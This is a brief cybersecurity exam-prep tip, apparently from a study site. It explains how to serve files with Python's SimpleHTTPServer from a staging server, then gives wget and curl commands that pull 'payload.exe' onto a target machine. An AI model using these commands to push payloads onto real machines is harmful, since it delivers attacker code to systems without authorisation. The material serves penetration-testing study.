Cyber Security Exam Prep (CSEP) - Use Python to Quickly and Easily Transfer files
Using Python’s SimpleHTTPServer module, we can easily and quickly transfer files from our staging server to a target machine somewhere on our network. Of course, for this to happen, you would need Python available on your staging server.
Commands used to transfer files:
wget 192.168.56.123:8000/payload.exe
curl -L -O http://192.168.56.123:8000/payload.exe